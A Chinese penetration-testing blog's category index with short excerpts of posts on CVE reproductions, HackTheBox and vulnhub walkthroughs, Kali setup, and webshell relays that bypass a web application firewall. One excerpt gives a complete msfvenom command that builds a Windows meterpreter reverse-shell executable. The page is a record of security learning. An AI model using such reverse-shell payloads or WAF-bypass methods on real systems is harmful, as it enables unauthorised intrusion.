随笔分类 -  渗透测试

摘要:Apache Shiro 身份认证绕过漏洞(CVE-2022-32532)漏洞复现 0x01 漏洞简介 ​ Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API,您可以快速、轻松地保护任何应用程序 —— 从最 阅读全文
posted @ 2022-06-30 11:19 xyongsec 阅读(608) 评论(0) 推荐(0)
摘要:HackTheBox-Knife靶场实战 靶场信息 信息搜集 首先使用nmap进行端口扫描 我们得知开启了22和80端口 出于能不爆破就不爆破的原则,先访问80端口看一下 80端口上的内容有点不明所以。 在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁点 阅读全文
posted @ 2021-05-26 15:06 xyongsec 阅读(649) 评论(0) 推荐(1)
摘要:#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib # 阅读全文
posted @ 2021-05-26 11:40 xyongsec 阅读(4344) 评论(0) 推荐(0)
摘要:本站所提供工具仅供技术学习交流、请勿用于非法行为、否则后果自负。 Acunetix,自动化网络应用安全软件的先驱,已经宣布发布Acunetix第13版。新版本提供了一个改进的用户界面,并引入了创新,如SmartScan引擎,恶意软件检测功能,全面的网络扫描,验证利用,增量扫描等等。 详细信息:htt 阅读全文
posted @ 2020-02-27 09:36 xyongsec 阅读(13382) 评论(3) 推荐(2)
摘要:前言 Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 阅读全文
posted @ 2020-02-21 11:59 xyongsec 阅读(7527) 评论(3) 推荐(1)
摘要:vulnhub AI: Web: 1 提取flag攻略 导入虚拟机,开机。 扫描NAT的C段,确定虚拟机IP和开放端口。 尝试访问该网站 发现什么都没有,抽根烟冷静一下...... 来波目录扫描吧 使用 dirsearch 进行目录扫描 扫描发现存在 robots.txt文件 访问该文件看看有啥新发 阅读全文
posted @ 2019-09-18 10:01 xyongsec 阅读(665) 评论(2) 推荐(0)
摘要:漏洞环境 使用VMware 安装Windows7 SP1模拟受害机 利用 攻击工具准备 1.使用如下命令一键更新安装的metasploit框架 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config 阅读全文
posted @ 2019-09-09 14:26 xyongsec 阅读(16765) 评论(5) 推荐(1)
摘要:基于windows 10打造的kali工具集.iso,适合于习惯使用windows的安全从业者。if you like it,please touch star! 作为安全从业主,Kali都是必备工具箱,一款作为黑客常用工具的集合平台深受安全人员喜欢。但是Kali是从BT5转变而来,所以是基于Lin 阅读全文
posted @ 2019-07-31 09:14 xyongsec 阅读(11048) 评论(15) 推荐(1)
摘要:环境部署 首先下载vulhub项目地址:https://github.com/vulhub/vulhub 进入需要部署的系统环境: 使用docker编译启动(出现done表示已经启动完成) 建议提前给docker配置镜像加速器(方法在另一篇博客) 访问`http://your-ip:7001/`即可 阅读全文
posted @ 2019-07-03 11:44 xyongsec 阅读(6933) 评论(0) 推荐(0)
摘要:在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台将软件发给客户机上运行,此时ka 阅读全文
posted @ 2019-06-22 13:41 xyongsec 阅读(3133) 评论(0) 推荐(0)
摘要:丢给你一个txt并同时获取你shell 0x00:回顾 《文本编辑器Vim/Neovim被曝任意代码执行漏洞》 听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。 git clone https://github.com/numirias/ 阅读全文
posted @ 2019-06-22 13:15 xyongsec 阅读(565) 评论(0) 推荐(0)
摘要:Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web 阅读全文
posted @ 2019-06-22 13:09 xyongsec 阅读(3461) 评论(0) 推荐(0)
摘要:一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器 创建一个属于自己的靶机 为正确的通信配置虚拟机 了解易受攻击的虚拟机上的 阅读全文
posted @ 2019-06-22 12:50 xyongsec 阅读(2995) 评论(2) 推荐(0)
摘要:前言 在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。 客户端 本地127.0.0.1,安装python2phpshellproxy.py 运行需要安装 服务端 shell端192.168.253. 阅读全文
posted @ 2019-06-21 16:30 xyongsec 阅读(406) 评论(0) 推荐(0)
摘要:前言 听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗。原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数 阅读全文
posted @ 2019-06-21 16:26 xyongsec 阅读(932) 评论(0) 推荐(0)
摘要:一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: l 在Windows和Linux上安装VirtualBox l 创建一个Kali Linux虚拟机 l 更新和升级Kali Linux l 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) l 创建 阅读全文
posted @ 2019-06-21 13:49 xyongsec 阅读(708) 评论(0) 推荐(0)